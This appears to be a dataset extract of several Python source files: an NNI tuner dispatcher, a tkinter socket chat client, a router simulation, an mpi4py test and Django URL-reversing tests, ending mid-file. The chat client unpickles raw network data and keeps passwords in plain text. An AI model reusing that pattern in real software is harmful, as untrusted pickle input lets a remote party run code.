source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
msg_dispatcher_base.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and
# associated documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish, distribute,
# sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT
# NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT
# OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# ==================================================================================================
import os
import threading
import logging
from multiprocessing.dummy import Pool as ThreadPool
from queue import Queue, Empty
import json_tricks
from .common import multi_thread_enabled
from .env_vars import dispatcher_env_vars
from .utils import init_dispatcher_logger
from .recoverable import Recoverable
from .protocol import CommandType, receive
init_dispatcher_logger()
_logger = logging.getLogger(__name__)
QUEUE_LEN_WARNING_MARK = 20
_worker_fast_exit_on_terminate = True
class MsgDispatcherBase(Recoverable):
"""This is where tuners and assessors are not defined yet.
Inherits this class to make your own advisor.
"""
def __init__(self):
if multi_thread_enabled():
self.pool = ThreadPool()
self.thread_results = []
else:
self.stopping = False
self.default_command_queue = Queue()
self.assessor_command_queue = Queue()
self.default_worker = threading.Thread(target=self.command_queue_worker, args=(self.default_command_queue,))
self.assessor_worker = threading.Thread(target=self.command_queue_worker,
args=(self.assessor_command_queue,))
self.default_worker.start()
self.assessor_worker.start()
self.worker_exceptions = []
def run(self):
"""Run the tuner.
This function will never return unless raise.
"""
_logger.info('Start dispatcher')
if dispatcher_env_vars.NNI_MODE == 'resume':
self.load_checkpoint()
while True:
command, data = receive()
if data:
data = json_tricks.loads(data)
if command is None or command is CommandType.Terminate:
break
if multi_thread_enabled():
result = self.pool.map_async(self.process_command_thread, [(command, data)])
self.thread_results.append(result)
if any([thread_result.ready() and not thread_result.successful() for thread_result in
self.thread_results]):
_logger.debug('Caught thread exception')
break
else:
self.enqueue_command(command, data)
if self.worker_exceptions:
break
_logger.info('Dispatcher exiting...')
self.stopping = True
if multi_thread_enabled():
self.pool.close()
self.pool.join()
else:
self.default_worker.join()
self.assessor_worker.join()
_logger.info('Terminated by NNI manager')
def command_queue_worker(self, command_queue):
"""Process commands in command queues.
"""
while True:
try:
# set timeout to ensure self.stopping is checked periodically
command, data = command_queue.get(timeout=3)
try:
self.process_command(command, data)
except Exception as e:
_logger.exception(e)
self.worker_exceptions.append(e)
break
except Empty:
pass
if self.stopping and (_worker_fast_exit_on_terminate or command_queue.empty()):
break
def enqueue_command(self, command, data):
"""Enqueue command into command queues
"""
if command == CommandType.TrialEnd or (
command == CommandType.ReportMetricData and data['type'] == 'PERIODICAL'):
self.assessor_command_queue.put((command, data))
else:
self.default_command_queue.put((command, data))
qsize = self.default_command_queue.qsize()
if qsize >= QUEUE_LEN_WARNING_MARK:
_logger.warning('default queue length: %d', qsize)
qsize = self.assessor_command_queue.qsize()
if qsize >= QUEUE_LEN_WARNING_MARK:
_logger.warning('assessor queue length: %d', qsize)
def process_command_thread(self, request):
"""Worker thread to process a command.
"""
command, data = request
if multi_thread_enabled():
try:
self.process_command(command, data)
except Exception as e:
_logger.exception(str(e))
raise
else:
pass
def process_command(self, command, data):
_logger.debug('process_command: command: [{}], data: [{}]'.format(command, data))
command_handlers = {
# Tuner commands:
CommandType.Initialize: self.handle_initialize,
CommandType.RequestTrialJobs: self.handle_request_trial_jobs,
CommandType.UpdateSearchSpace: self.handle_update_search_space,
CommandType.ImportData: self.handle_import_data,
CommandType.AddCustomizedTrialJob: self.handle_add_customized_trial,
# Tuner/Assessor commands:
CommandType.ReportMetricData: self.handle_report_metric_data,
CommandType.TrialEnd: self.handle_trial_end,
CommandType.Ping: self.handle_ping,
}
if command not in command_handlers:
raise AssertionError('Unsupported command: {}'.format(command))
command_handlers[command](data)
def handle_ping(self, data):
pass
def handle_initialize(self, data):
"""Initialize search space and tuner, if any
This method is meant to be called only once for each experiment, after calling this method,
dispatcher should `send(CommandType.Initialized, '')`, to set the status of the experiment to be "INITIALIZED".
Parameters
----------
data: dict
search space
"""
raise NotImplementedError('handle_initialize not implemented')
def handle_request_trial_jobs(self, data):
"""The message dispatcher is demanded to generate `data` trial jobs.
These trial jobs should be sent via `send(CommandType.NewTrialJob, json_tricks.dumps(parameter))`,
where `parameter` will be received by NNI Manager and eventually accessible to trial jobs as "next parameter".
Semantically, message dispatcher should do this `send` exactly `data` times.
The JSON sent by this method should follow the format of
{
"parameter_id": 42
"parameters": {
// this will be received by trial
},
"parameter_source": "algorithm" // optional
}
Parameters
----------
data: int
number of trial jobs
"""
raise NotImplementedError('handle_request_trial_jobs not implemented')
def handle_update_search_space(self, data):
"""This method will be called when search space is updated.
It's recommended to call this method in `handle_initialize` to initialize search space.
*No need to* notify NNI Manager when this update is done.
Parameters
----------
data: dict
search space
"""
raise NotImplementedError('handle_update_search_space not implemented')
def handle_import_data(self, data):
"""Import previous data when experiment is resumed.
Parameters
----------
data: list
a list of dictionaries, each of which has at least two keys, 'parameter' and 'value'
"""
raise NotImplementedError('handle_import_data not implemented')
def handle_add_customized_trial(self, data):
"""Experimental API. Not recommended for usage.
"""
raise NotImplementedError('handle_add_customized_trial not implemented')
def handle_report_metric_data(self, data):
"""Called when metric data is reported or new parameters are requested (for multiphase).
When new parameters are requested, this method should send a new parameter.
Parameters
----------
data: dict
a dict which contains 'parameter_id', 'value', 'trial_job_id', 'type', 'sequence'.
type: can be `MetricType.REQUEST_PARAMETER`, `MetricType.FINAL` or `MetricType.PERIODICAL`.
`REQUEST_PARAMETER` is used to request new parameters for multiphase trial job. In this case,
the dict will contain additional keys: `trial_job_id`, `parameter_index`. Refer to `msg_dispatcher.py`
as an example.
Raises
------
ValueError
Data type is not supported
"""
raise NotImplementedError('handle_report_metric_data not implemented')
def handle_trial_end(self, data):
"""Called when the state of one of the trials is changed
Parameters
----------
data: dict
a dict with keys: trial_job_id, event, hyper_params.
trial_job_id: the id generated by training service.
event: the job’s state.
hyper_params: the string that is sent by message dispatcher during the creation of trials.
"""
raise NotImplementedError('handle_trial_end not implemented')
|
client.py
|
import tkinter, logging, socket, time, pickle, threading, shelve, os
from tkinter.scrolledtext import ScrolledText
logging.basicConfig(level = logging.DEBUG, format = '%(asctime)s - %(message)s')
class Client(tkinter.Tk):
def __init__(self):
super(). __init__()
logging.debug('Client started')
self.user = {}
self.contacts = []
#load settings
if os.path.isfile('settings.bak'):
settings_obj = shelve.open('settings')
print(list(settings_obj.keys()))
if 'user' in list(settings_obj.keys()):
self.user['username'] = settings_obj['user']
self.user['password'] = settings_obj['password']
else :
self.user = {'username': 'test', 'password': 'test'}
if 'port' in list(settings_obj.keys()):
self.port = int(settings_obj['port'])
else:
self.port = 888
if 'host' in list(settings_obj.keys()):
self.host = settings_obj['host']
else:
self.host = '127.0.0.1'
if 'contacts' in list(settings_obj.keys()):
self.contacts = settings_obj['contacts']
else:
self.contacts = ['Test']
settings_obj.close()
print(type(self.port))
print(type(self.host))
else:
self.user = {'username': 'test', 'password': 'test'}
self.port = 888
self.host = '127.0.0.1'
self.contacts = ['Test']
self.font = ('Tahmona', '8')
self.messages_to_send = []
self.child_chat_windows = []
#top menu
self.menu_bar = tkinter.Menu(self)
self.file_menu = tkinter.Menu(self.menu_bar, tearoff = 0, font = self.font)
self.file_menu.add_command(label = 'Add user', command = lambda: self.add_user_to_list(), font = self.font)
self.file_menu.add_command(label = 'Settings', font = self.font, command = lambda: self.settings())
self.menu_bar.add_cascade(label = 'settings', menu = self.file_menu, font = self.font)
self.config(menu = self.menu_bar)
#window elements
self.title('Contact List ' + self.user['username'])
self.resizable('false','false')
self.who_am_i = tkinter.Label(self, text = self.user['username'])
self.who_am_i.grid(column = 1, row = 1)
self.names_list = tkinter.Listbox(self, height = 30, width = 30, font = self.font)
self.names_list.grid(column = 1, row = 2)
self.button_start_chat = tkinter.Button(self, text = 'start chat', command = lambda: self.start_chat(), width = 30, font = self.font)
self.button_start_chat.grid(column = 1, row = 3)
self.button_add_user = tkinter.Button(self, text = 'remove selected user', command = lambda : self.remove_user_from_list(), width = 30, font = self.font)
self.button_add_user.grid(column = 1, row = 4)
self.update_list()
#threads
t_loop = threading.Thread(target = self.logging_loop, daemon = True).start()
t_server_connection = threading.Thread(target = self.server_connection, daemon = True).start()
# server connection transporter
def server_connection(self):
logging.debug('server_connection')
#echo frame sender / pass / message - echo
echo = {'username': self.user['username'], 'password': self.user['password'], 'message': 'echo'}
echo_pickle = pickle.dumps(echo)
while True:
time.sleep(1)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.host, self.port))
for i in self.messages_to_send:
self.messages_to_send.remove(i)
ii = pickle.dumps(i)
s.sendall(ii)
break
s.sendall(echo_pickle)
data_pickle = s.recv(1024)
data = pickle.loads(data_pickle)
if type(data) == dict:
in_list = False
for i in self.child_chat_windows:
if data['sender'] == i.recipient_name:
in_list = True
if in_list == True:
i.text_chat_window.configure(state = 'normal')
i.text_chat_window.insert('end', 'from ' + data['sender'] + ': ' + data['message'] + '\n')
i.text_chat_window.configure(state = 'disabled')
i.text_chat_window.see('end')
else:
self.start_chat(data['sender'])
for i in self.child_chat_windows:
if data['sender'] == i.recipient_name:
i.text_chat_window.configure(state = 'normal')
i.text_chat_window.insert('end', 'from ' + data['sender'] + ': ' + data['message'] + '\n')
i.text_chat_window.configure(state = 'disabled')
i.text_chat_window.see('end')
#update contact list
def update_list(self, name = None):
logging.debug('update_list')
self.names_list.delete('0', 'end')
if name:
if name not in self.contacts:
self.contacts.append(name)
for i in self.contacts:
self.names_list.insert('end', i)
with shelve.open('settings') as settings_obj:
settings_obj['contacts'] = self.contacts
settings_obj.close()
#add user to list - class
def add_user_to_list(self):
child_client_add_user_window = Client_add_user_window(self)
#remove user from list
def remove_user_from_list(self):
self.contacts.remove(self.names_list.get('active'))
self.update_list()
#start settings window - class
def settings(self):
child_settings_window = Settings_window(self)
#start chat window - class
def start_chat(self, recipient = None):
if recipient == None:
name_from_list = self.names_list.get('active')
else:
name_from_list = recipient
child_chat_window = Client_chat_window(self, name_from_list)
self.child_chat_windows.append(child_chat_window)
#logging loop
def logging_loop(self):
time.sleep(1)
while True:
time.sleep(0.5)
print(self.child_chat_windows)
time.sleep(2)
print(self.messages_to_send)
for i in self.child_chat_windows:
print(i.recipient_name)
class Settings_window(tkinter.Toplevel):
def __init__(self, parent):
super(). __init__()
self.parent = parent
self.title('Settings')
# window settings
self.label_user = tkinter.Label(self, text = 'user', font = self.parent.font)
self.label_user.grid(column = 1, row = 1)
self.entry_user = tkinter.Entry(self, width = 30, font = self.parent.font)
self.entry_user.insert('end', self.parent.user['username'])
self.entry_user.grid(column = 1, row = 2)
self.label_password = tkinter.Label(self,text = 'password', font = self.parent.font)
self.label_password.grid(column = 1, row = 3)
self.entry_password = tkinter.Entry(self, width = 30, font = self.parent.font)
self.entry_password.insert('end', self.parent.user['password'])
self.entry_password.grid(column = 1, row = 4)
self.label_server = tkinter.Label(self, text = 'server IP', font = self.parent.font)
self.label_server.grid(column = 1, row = 5)
self.entry_server = tkinter.Entry(self, width = 30, font = self.parent.font)
self.entry_server.insert('end', self.parent.host)
self.entry_server.grid(column = 1, row = 6)
self.label_port = tkinter.Label(self, text = 'server port', font = self.parent.font)
self.label_port.grid(column = 1, row = 7)
self.entry_port = tkinter.Entry(self, width = 30, font = self.parent.font)
self.entry_port.insert('end', self.parent.port)
self.entry_port.grid(column = 1, row = 8)
self.button_ok_save = tkinter.Button(self, text = 'OK & Save', command = lambda: self.ok_save(), font = self.parent.font)
self.button_ok_save.grid(column = 1, row = 10)
self.button_ok_save.focus_set()
self.info_label = tkinter.Label(self, text = 'Restart needed to apply changes', font = ('Impact', '9'))
self.info_label.grid(column = 1, row = 9)
#save data to file
def ok_save(self):
data_obj = shelve.open('settings')
data_obj['user'] = self.entry_user.get()
data_obj['password'] = self.entry_password.get()
data_obj['host'] = self.entry_server.get()
data_obj['port'] = int(self.entry_port.get())
data_obj.close()
self.destroy()
class Client_chat_window(tkinter.Toplevel):
def __init__(self, parent, recipient_name):
super(). __init__()
self.parent = parent
self.recipient_name = recipient_name
self.title('Chat with ' + recipient_name)
self.protocol("WM_DELETE_WINDOW", self.close)
#normal window
# ~ self.text_chat_window = tkinter.Text(self, width = 70, height = 15)
#scrolled window
self.text_chat_window = ScrolledText(self, width = 70, height = 15)
self.text_chat_window.grid(column = 1, row = 1)
self.entry_message_field = (tkinter.Entry(self, width = 65))
self.entry_message_field.bind('<Return>', self.enter_action)
self.entry_message_field.grid(column = 1, row = 2)
self.entry_message_field.focus_set()
self.text_chat_window.configure(state = 'disabled')
def enter_action(self, event):
#enter field to chat window
message = self.entry_message_field.get()
self.text_chat_window.configure(state = 'normal')
self.text_chat_window.insert('end', self.parent.user['username'] + ': ' + message + '\n')
self.text_chat_window.configure(state = 'disabled')
self.text_chat_window.see('end')
self.entry_message_field.delete('0', 'end')
#message to send, whole frame
message = {'sender': self.parent.user['username'], 'recipient': self.recipient_name, 'message': message}
self.parent.messages_to_send.append(message)
def close(self):
for i in self.parent.child_chat_windows:
if i.recipient_name == self.recipient_name:
self.parent.child_chat_windows.remove(i)
self.destroy()
class Client_add_user_window(tkinter.Toplevel):
def __init__(self, parent):
super(). __init__()
self.parent = parent
self.title('Add user...')
self.entry_add_user = tkinter.Entry(self, width = 30)
self.entry_add_user.focus_set()
self.entry_add_user.grid(column = 1, row = 1)
self.button_ok = tkinter.Button(self, text = 'ok', width = 30, command = lambda: self.button_ok_action())
self.button_ok.grid(column = 1, row = 2)
def button_ok_action(self):
name = self.entry_add_user.get().strip()
self.parent.update_list(name)
self.destroy()
if __name__ == '__main__':
client = Client()
client.mainloop()
|
simulation_3.py
|
'''
Created on Oct 12, 2016
@author: mwittie
'''
import network_3 as network
import link_3 as link
import threading
from time import sleep
##configuration parameters
router_queue_size = 0 #0 means unlimited
simulation_time = 20 #give the network sufficient time to transfer all packets before quitting
if __name__ == '__main__':
# Router Tables
table_A = {
1: 0,
2: 1
}
table_B = {
1: 0
}
table_C = {
2: 0
}
table_D = {
1: 0,
2: 1
}
object_L = [] #keeps track of objects, so we can kill their threads
#create network nodes
# Host 1
client1 = network.Host(1)
object_L.append(client1)
# Host 2
client2 = network.Host(2)
object_L.append(client2)
# Host 3
server1 = network.Host(3)
object_L.append(server1)
# Host 4
server2 = network.Host(4)
object_L.append(server2)
# Router A
router_a = network.Router(name='A', intf_count=len(table_A), max_queue_size=router_queue_size, routing_table=table_A)
object_L.append(router_a)
# Router B
router_b = network.Router(name='B', intf_count=len(table_B), max_queue_size=router_queue_size, routing_table=table_B)
object_L.append(router_b)
# Router C
router_c = network.Router(name='C', intf_count=len(table_C), max_queue_size=router_queue_size, routing_table=table_C)
object_L.append(router_c)
# Router D
router_d = network.Router(name='D', intf_count=len(table_D), max_queue_size=router_queue_size, routing_table=table_D)
object_L.append(router_d)
#create a Link Layer to keep track of links between network nodes
link_layer = link.LinkLayer()
object_L.append(link_layer)
#add all the links
#link parameters: from_node, from_intf_num, to_node, to_intf_num, mtu
link_layer.add_link(link.Link(client1, 0, router_a, 0, 50))
link_layer.add_link(link.Link(client2, 0, router_a, 1, 50))
# Router A links to next object
link_layer.add_link(link.Link(router_a, 0, router_b, 0, 50))
link_layer.add_link(link.Link(router_a, 1, router_c, 0, 50))
# Router B links to next object
link_layer.add_link(link.Link(router_b, 0, router_d, 0, 30))
# Router C links to next object
link_layer.add_link(link.Link(router_c, 0, router_d, 1, 30))
# Router D links to next object
link_layer.add_link(link.Link(router_d, 0, server1, 0, 50))
link_layer.add_link(link.Link(router_d, 1, server2, 0, 50))
#start all the objects
thread_L = []
# Host Threads
thread_L.append(threading.Thread(name=client1.__str__(), target=client1.run))
thread_L.append(threading.Thread(name=client2.__str__(), target=client2.run))
thread_L.append(threading.Thread(name=server1.__str__(), target=server1.run))
thread_L.append(threading.Thread(name=server2.__str__(), target=server2.run))
# Routerr Threads
thread_L.append(threading.Thread(name=router_a.__str__(), target=router_a.run))
thread_L.append(threading.Thread(name=router_b.__str__(), target=router_b.run))
thread_L.append(threading.Thread(name=router_c.__str__(), target=router_c.run))
thread_L.append(threading.Thread(name=router_d.__str__(), target=router_d.run))
thread_L.append(threading.Thread(name="Network", target=link_layer.run))
for t in thread_L:
t.start()
#create some send events
for i in range(3):
message = 'Sample data yaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaay %d' % i
client1.udt_send(1, 3, message)
client2.udt_send(2, 4, message)
#give the network sufficient time to transfer all packets before quitting
sleep(simulation_time)
#join all threads
for o in object_L:
o.stop = True
for t in thread_L:
t.join()
print("All simulation threads joined")
# writes to host periodically
|
threads.py
|
#!/usr/bin/env python
if False:
import mpi4py
name = "name" # lib{name}.so
path = []
mpi4py.profile(name, path=path)
import threading
from mpi4py import MPI
from array import array
send_msg = array('i', [7]*1000); send_msg *= 1000
recv_msg = array('i', [0]*1000); recv_msg *= 1000
def self_send(comm, rank):
comm.Send([send_msg, MPI.INT], dest=rank, tag=0)
def self_recv(comm, rank):
comm.Recv([recv_msg, MPI.INT], source=rank, tag=0)
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
send_thread = threading.Thread(target=self_send, args=(comm, rank))
recv_thread = threading.Thread(target=self_recv, args=(comm, rank))
send_thread.start()
recv_thread.start()
recv_thread.join()
send_thread.join()
|
tests.py
|
"""
Unit tests for reverse URL lookups.
"""
import sys
import threading
from admin_scripts.tests import AdminScriptTestCase
from django.conf import settings
from django.contrib.auth.models import User
from django.core.exceptions import ImproperlyConfigured, ViewDoesNotExist
from django.http import (
HttpRequest, HttpResponsePermanentRedirect, HttpResponseRedirect,
)
from django.shortcuts import redirect
from django.test import (
RequestFactory, SimpleTestCase, TestCase, override_settings,
)
from django.test.utils import override_script_prefix
from django.urls import (
NoReverseMatch, Resolver404, ResolverMatch, URLPattern, URLResolver,
get_callable, get_resolver, get_urlconf, include, path, re_path, resolve,
reverse, reverse_lazy,
)
from django.urls.resolvers import RegexPattern
from . import middleware, urlconf_outer, views
from .utils import URLObject
from .views import empty_view
resolve_test_data = (
# These entries are in the format: (path, url_name, app_name, namespace, view_name, func, args, kwargs)
# Simple case
('/normal/42/37/', 'normal-view', '', '', 'normal-view', views.empty_view, (), {'arg1': '42', 'arg2': '37'}),
(
'/view_class/42/37/', 'view-class', '', '', 'view-class', views.view_class_instance, (),
{'arg1': '42', 'arg2': '37'}
),
(
'/included/normal/42/37/', 'inc-normal-view', 'included_namespace_urls',
'included_namespace_urls', 'included_namespace_urls:inc-normal-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/included/view_class/42/37/', 'inc-view-class', 'included_namespace_urls',
'included_namespace_urls', 'included_namespace_urls:inc-view-class',
views.view_class_instance, (), {'arg1': '42', 'arg2': '37'}
),
# Unnamed args are dropped if you have *any* kwargs in a pattern
('/mixed_args/42/37/', 'mixed-args', '', '', 'mixed-args', views.empty_view, (), {'arg2': '37'}),
(
'/included/mixed_args/42/37/', 'inc-mixed-args', 'included_namespace_urls',
'included_namespace_urls', 'included_namespace_urls:inc-mixed-args',
views.empty_view, (), {'arg2': '37'}
),
(
'/included/12/mixed_args/42/37/', 'inc-mixed-args', 'included_namespace_urls',
'included_namespace_urls', 'included_namespace_urls:inc-mixed-args',
views.empty_view, (), {'arg2': '37'}
),
# Unnamed views should have None as the url_name. Regression data for #21157.
(
'/unnamed/normal/42/37/', None, '', '', 'urlpatterns_reverse.views.empty_view', views.empty_view, (),
{'arg1': '42', 'arg2': '37'}
),
(
'/unnamed/view_class/42/37/', None, '', '', 'urlpatterns_reverse.views.ViewClass', views.view_class_instance,
(), {'arg1': '42', 'arg2': '37'}
),
# If you have no kwargs, you get an args list.
('/no_kwargs/42/37/', 'no-kwargs', '', '', 'no-kwargs', views.empty_view, ('42', '37'), {}),
(
'/included/no_kwargs/42/37/', 'inc-no-kwargs', 'included_namespace_urls',
'included_namespace_urls', 'included_namespace_urls:inc-no-kwargs',
views.empty_view, ('42', '37'), {}
),
(
'/included/12/no_kwargs/42/37/', 'inc-no-kwargs', 'included_namespace_urls',
'included_namespace_urls', 'included_namespace_urls:inc-no-kwargs',
views.empty_view, ('12', '42', '37'), {}
),
# Namespaces
(
'/test1/inner/42/37/', 'urlobject-view', 'testapp', 'test-ns1', 'test-ns1:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/included/test3/inner/42/37/', 'urlobject-view', 'included_namespace_urls:testapp',
'included_namespace_urls:test-ns3', 'included_namespace_urls:test-ns3:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/ns-included1/normal/42/37/', 'inc-normal-view', 'included_namespace_urls',
'inc-ns1', 'inc-ns1:inc-normal-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/included/test3/inner/42/37/', 'urlobject-view', 'included_namespace_urls:testapp',
'included_namespace_urls:test-ns3', 'included_namespace_urls:test-ns3:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/default/inner/42/37/', 'urlobject-view', 'testapp', 'testapp', 'testapp:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/other2/inner/42/37/', 'urlobject-view', 'nodefault', 'other-ns2', 'other-ns2:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/other1/inner/42/37/', 'urlobject-view', 'nodefault', 'other-ns1', 'other-ns1:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
# Nested namespaces
(
'/ns-included1/test3/inner/42/37/', 'urlobject-view', 'included_namespace_urls:testapp',
'inc-ns1:test-ns3', 'inc-ns1:test-ns3:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/ns-included1/ns-included4/ns-included2/test3/inner/42/37/', 'urlobject-view',
'included_namespace_urls:namespace_urls:included_namespace_urls:testapp',
'inc-ns1:inc-ns4:inc-ns2:test-ns3',
'inc-ns1:inc-ns4:inc-ns2:test-ns3:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/app-included/test3/inner/42/37/', 'urlobject-view', 'included_namespace_urls:testapp', 'inc-app:test-ns3',
'inc-app:test-ns3:urlobject-view', views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/app-included/ns-included4/ns-included2/test3/inner/42/37/', 'urlobject-view',
'included_namespace_urls:namespace_urls:included_namespace_urls:testapp',
'inc-app:inc-ns4:inc-ns2:test-ns3',
'inc-app:inc-ns4:inc-ns2:test-ns3:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
# Namespaces capturing variables
(
'/inc70/', 'inner-nothing', 'included_urls', 'inc-ns5', 'inc-ns5:inner-nothing',
views.empty_view, (), {'outer': '70'}
),
(
'/inc78/extra/foobar/', 'inner-extra', 'included_urls', 'inc-ns5', 'inc-ns5:inner-extra',
views.empty_view, (), {'outer': '78', 'extra': 'foobar'}
),
)
test_data = (
('places', '/places/3/', [3], {}),
('places', '/places/3/', ['3'], {}),
('places', NoReverseMatch, ['a'], {}),
('places', NoReverseMatch, [], {}),
('places?', '/place/', [], {}),
('places+', '/places/', [], {}),
('places*', '/place/', [], {}),
('places2?', '/', [], {}),
('places2+', '/places/', [], {}),
('places2*', '/', [], {}),
('places3', '/places/4/', [4], {}),
('places3', '/places/harlem/', ['harlem'], {}),
('places3', NoReverseMatch, ['harlem64'], {}),
('places4', '/places/3/', [], {'id': 3}),
('people', NoReverseMatch, [], {}),
('people', '/people/adrian/', ['adrian'], {}),
('people', '/people/adrian/', [], {'name': 'adrian'}),
('people', NoReverseMatch, ['name with spaces'], {}),
('people', NoReverseMatch, [], {'name': 'name with spaces'}),
('people2', '/people/name/', [], {}),
('people2a', '/people/name/fred/', ['fred'], {}),
('people_backref', '/people/nate-nate/', ['nate'], {}),
('people_backref', '/people/nate-nate/', [], {'name': 'nate'}),
('optional', '/optional/fred/', [], {'name': 'fred'}),
('optional', '/optional/fred/', ['fred'], {}),
('named_optional', '/optional/1/', [1], {}),
('named_optional', '/optional/1/', [], {'arg1': 1}),
('named_optional', '/optional/1/2/', [1, 2], {}),
('named_optional', '/optional/1/2/', [], {'arg1': 1, 'arg2': 2}),
('named_optional_terminated', '/optional/1/', [1], {}),
('named_optional_terminated', '/optional/1/', [], {'arg1': 1}),
('named_optional_terminated', '/optional/1/2/', [1, 2], {}),
('named_optional_terminated', '/optional/1/2/', [], {'arg1': 1, 'arg2': 2}),
('hardcoded', '/hardcoded/', [], {}),
('hardcoded2', '/hardcoded/doc.pdf', [], {}),
('people3', '/people/il/adrian/', [], {'state': 'il', 'name': 'adrian'}),
('people3', NoReverseMatch, [], {'state': 'il'}),
('people3', NoReverseMatch, [], {'name': 'adrian'}),
('people4', NoReverseMatch, [], {'state': 'il', 'name': 'adrian'}),
('people6', '/people/il/test/adrian/', ['il/test', 'adrian'], {}),
('people6', '/people//adrian/', ['adrian'], {}),
('range', '/character_set/a/', [], {}),
('range2', '/character_set/x/', [], {}),
('price', '/price/$10/', ['10'], {}),
('price2', '/price/$10/', ['10'], {}),
('price3', '/price/$10/', ['10'], {}),
('product', '/product/chocolate+($2.00)/', [], {'price': '2.00', 'product': 'chocolate'}),
('headlines', '/headlines/2007.5.21/', [], {'year': 2007, 'month': 5, 'day': 21}),
(
'windows', r'/windows_path/C:%5CDocuments%20and%20Settings%5Cspam/', [],
{'drive_name': 'C', 'path': r'Documents and Settings\spam'}
),
('special', r'/special_chars/~@+%5C$*%7C/', [r'~@+\$*|'], {}),
('special', r'/special_chars/some%20resource/', [r'some resource'], {}),
('special', r'/special_chars/10%25%20complete/', [r'10% complete'], {}),
('special', r'/special_chars/some%20resource/', [], {'chars': r'some resource'}),
('special', r'/special_chars/10%25%20complete/', [], {'chars': r'10% complete'}),
('special', NoReverseMatch, [''], {}),
('mixed', '/john/0/', [], {'name': 'john'}),
('repeats', '/repeats/a/', [], {}),
('repeats2', '/repeats/aa/', [], {}),
('repeats3', '/repeats/aa/', [], {}),
('test', '/test/1', [], {}),
('inner-nothing', '/outer/42/', [], {'outer': '42'}),
('inner-nothing', '/outer/42/', ['42'], {}),
('inner-nothing', NoReverseMatch, ['foo'], {}),
('inner-extra', '/outer/42/extra/inner/', [], {'extra': 'inner', 'outer': '42'}),
('inner-extra', '/outer/42/extra/inner/', ['42', 'inner'], {}),
('inner-extra', NoReverseMatch, ['fred', 'inner'], {}),
('inner-no-kwargs', '/outer-no-kwargs/42/inner-no-kwargs/1/', ['42', '1'], {}),
('disjunction', NoReverseMatch, ['foo'], {}),
('inner-disjunction', NoReverseMatch, ['10', '11'], {}),
('extra-places', '/e-places/10/', ['10'], {}),
('extra-people', '/e-people/fred/', ['fred'], {}),
('extra-people', '/e-people/fred/', [], {'name': 'fred'}),
('part', '/part/one/', [], {'value': 'one'}),
('part', '/prefix/xx/part/one/', [], {'value': 'one', 'prefix': 'xx'}),
('part2', '/part2/one/', [], {'value': 'one'}),
('part2', '/part2/', [], {}),
('part2', '/prefix/xx/part2/one/', [], {'value': 'one', 'prefix': 'xx'}),
('part2', '/prefix/xx/part2/', [], {'prefix': 'xx'}),
# Tests for nested groups. Nested capturing groups will only work if you
# *only* supply the correct outer group.
('nested-noncapture', '/nested/noncapture/opt', [], {'p': 'opt'}),
('nested-capture', '/nested/capture/opt/', ['opt/'], {}),
('nested-capture', NoReverseMatch, [], {'p': 'opt'}),
('nested-mixedcapture', '/nested/capture/mixed/opt', ['opt'], {}),
('nested-mixedcapture', NoReverseMatch, [], {'p': 'opt'}),
('nested-namedcapture', '/nested/capture/named/opt/', [], {'outer': 'opt/'}),
('nested-namedcapture', NoReverseMatch, [], {'outer': 'opt/', 'inner': 'opt'}),
('nested-namedcapture', NoReverseMatch, [], {'inner': 'opt'}),
('non_path_include', '/includes/non_path_include/', [], {}),
# Tests for #13154
('defaults', '/defaults_view1/3/', [], {'arg1': 3, 'arg2': 1}),
('defaults', '/defaults_view2/3/', [], {'arg1': 3, 'arg2': 2}),
('defaults', NoReverseMatch, [], {'arg1': 3, 'arg2': 3}),
('defaults', NoReverseMatch, [], {'arg2': 1}),
# Security tests
('security', '/%2Fexample.com/security/', ['/example.com'], {}),
)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.no_urls')
class NoURLPatternsTests(SimpleTestCase):
def test_no_urls_exception(self):
"""
URLResolver should raise an exception when no urlpatterns exist.
"""
resolver = URLResolver(RegexPattern(r'^$'), settings.ROOT_URLCONF)
with self.assertRaisesMessage(
ImproperlyConfigured,
"The included URLconf 'urlpatterns_reverse.no_urls' does not "
"appear to have any patterns in it. If you see valid patterns in "
"the file then the issue is probably caused by a circular import."
):
getattr(resolver, 'url_patterns')
@override_settings(ROOT_URLCONF='urlpatterns_reverse.urls')
class URLPatternReverse(SimpleTestCase):
def test_urlpattern_reverse(self):
for name, expected, args, kwargs in test_data:
